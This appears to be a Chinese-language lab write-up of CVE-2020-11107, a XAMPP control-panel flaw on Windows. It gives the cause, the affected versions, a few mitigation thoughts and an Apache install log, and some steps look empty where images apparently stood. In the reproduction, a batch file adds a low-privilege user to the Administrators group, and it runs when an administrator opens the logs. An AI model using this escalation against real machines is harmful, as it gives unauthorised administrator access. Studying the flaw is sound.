CVE-2020-11107-XAMPP任意命令执行漏洞

目录

1、XAMPP简介

2、漏洞成因

3、影响范围

4、环境搭建

下载XAMPP软件

查看root账户信息并添加账户lower

登录账户lower

新建脚本conn.bat

 运行XAMPP

提升为管理员权限

思考

---

1、XAMPP简介

XAMPP（Apache+MySQL+PHP+PERL）是一个功能强大的建站集成软件包。

这个软件包原来的名字是 LAMPP，但是为了避免误解，最新的几个版本就改名为 XAMPP 了。它可以在Windows、Linux、Solaris、Mac OS X 等多种操作系统下安装使用，支持多语言；XAMPP 的确非常容易安装和使用：只需下载，解压缩，启动即可。该软件和phpstudy类似。

2、漏洞成因

在windows下，XAMPP允许非管理员账号访问和修改其编辑器和浏览器的配置，编辑器的默认配置为notepad.exe，一旦修改配置后，则对应的每个可以访问XAMPP控制面板的用户都更改了配置。当攻击者将编辑器的值设置为恶意的.exe文件或.bat文件，与此同时如果有管理员账号通过XAMPP控制面板查看apache的日志文件，便会执行恶意的.exe文件或.bat文件，以此达到任意命令执行。

3、影响范围

Apache Friends XAMPP <7.2.29

Apache Friends XAMPP 7.3.*，<7.3.16

Apache Friends XAMPP 7.4.*，<7.4.4

4、环境搭建

下载XAMPP软件

查看root账户信息并添加账户lower

 

登录账户lower

新建脚本conn.bat

low用户新建conn.bat脚本，目的是将low用户添加到administrators组

@echo off

net localgroup administrators lower /add

 运行XAMPP

执行保存；之后转换用户为root用户，点击右键使用管理员运行xmpp软件；

提升为管理员权限

执行如下命令：

---

思考

回想整个过程，其实就是多加了一个XAMPP的过程，核心无非就是以管理员的权限内，添加用户进入管理员组

net localgroup administrators lower /add   ；正常情况下我们直接也可以实现该功能点；

目前看来XAMPP上的管理员相当于在配置config中，将刚才的命令加入该配置内，而logs按钮则是触发整个命令执行的关键点所在，如果不触发logs按钮则不会执行添加用户加入管理员组的权限；

以下是apache/logs文件夹下install文件

Installing Apache HTTP Server 2.x with
 DomainName    = example.com
 ServerName    = www.example.com
 ServerAdmin   = [email protected]
 ServerPort    = 80
 ServerSslPort = 443
 ServerRoot    = c:/Apache24
Rewrote docs/conf/extra/httpd-autoindex.conf.in
 to c:/Apache24/conf/original/extra/httpd-autoindex.conf
Rewrote docs/conf/extra/httpd-default.conf.in
 to c:/Apache24/conf/original/extra/httpd-default.conf
Rewrote docs/conf/extra/httpd-ssl.conf.in
 to c:/Apache24/conf/original/extra/httpd-ssl.conf
Rewrote docs/conf/extra/httpd-multilang-errordoc.conf.in
 to c:/Apache24/conf/original/extra/httpd-multilang-errordoc.conf
Rewrote docs/conf/extra/httpd-info.conf.in
 to c:/Apache24/conf/original/extra/httpd-info.conf
Rewrote docs/conf/extra/httpd-userdir.conf.in
 to c:/Apache24/conf/original/extra/httpd-userdir.conf
Rewrote docs/conf/extra/httpd-mpm.conf.in
 to c:/Apache24/conf/original/extra/httpd-mpm.conf
Rewrote docs/conf/httpd.conf.in
 to c:/Apache24/conf/original/httpd.conf
Rewrote docs/conf/extra/proxy-html.conf.in
 to c:/Apache24/conf/original/extra/proxy-html.conf
Rewrote docs/conf/extra/httpd-vhosts.conf.in
 to c:/Apache24/conf/original/extra/httpd-vhosts.conf
Rewrote docs/conf/extra/httpd-dav.conf.in
 to c:/Apache24/conf/original/extra/httpd-dav.conf
Rewrote docs/conf/extra/httpd-languages.conf.in
 to c:/Apache24/conf/original/extra/httpd-languages.conf
Rewrote docs/conf/extra/httpd-manual.conf.in
 to c:/Apache24/conf/original/extra/httpd-manual.conf
Duplicated c:/Apache24/conf/original/extra/httpd-autoindex.conf
 to c:/Apache24/conf/extra/httpd-autoindex.conf
Duplicated c:/Apache24/conf/original/extra/httpd-default.conf
 to c:/Apache24/conf/extra/httpd-default.conf
Duplicated c:/Apache24/conf/original/extra/httpd-ssl.conf
 to c:/Apache24/conf/extra/httpd-ssl.conf
Duplicated c:/Apache24/conf/original/extra/httpd-multilang-errordoc.conf
 to c:/Apache24/conf/extra/httpd-multilang-errordoc.conf
Duplicated c:/Apache24/conf/original/extra/httpd-info.conf
 to c:/Apache24/conf/extra/httpd-info.conf
Duplicated c:/Apache24/conf/original/extra/httpd-userdir.conf
 to c:/Apache24/conf/extra/httpd-userdir.conf
Duplicated c:/Apache24/conf/original/extra/httpd-mpm.conf
 to c:/Apache24/conf/extra/httpd-mpm.conf
Duplicated c:/Apache24/conf/original/httpd.conf
 to c:/Apache24/conf/httpd.conf
Duplicated c:/Apache24/conf/original/magic
 to c:/Apache24/conf/magic
Duplicated c:/Apache24/conf/original/charset.conv
 to c:/Apache24/conf/charset.conv
Duplicated c:/Apache24/conf/original/extra/proxy-html.conf
 to c:/Apache24/conf/extra/proxy-html.conf
Duplicated c:/Apache24/conf/original/extra/httpd-vhosts.conf
 to c:/Apache24/conf/extra/httpd-vhosts.conf
Duplicated c:/Apache24/conf/original/extra/httpd-dav.conf
 to c:/Apache24/conf/extra/httpd-dav.conf
Duplicated c:/Apache24/conf/original/mime.types
 to c:/Apache24/conf/mime.types
Duplicated c:/Apache24/conf/original/extra/httpd-languages.conf
 to c:/Apache24/conf/extra/httpd-languages.conf
Duplicated c:/Apache24/conf/original/extra/httpd-manual.conf
 to c:/Apache24/conf/extra/httpd-manual.conf

error文件下，可看到执行的命令过程

而执行该命令必须的根据配置走向而定位

控制台必定由它的配置文件决定如何控制，控制的范围；

后期修复的可操作性，可以让普通用户/管理员无操作该文件的权限；只有超管可以；

比如：

---

 结束！！！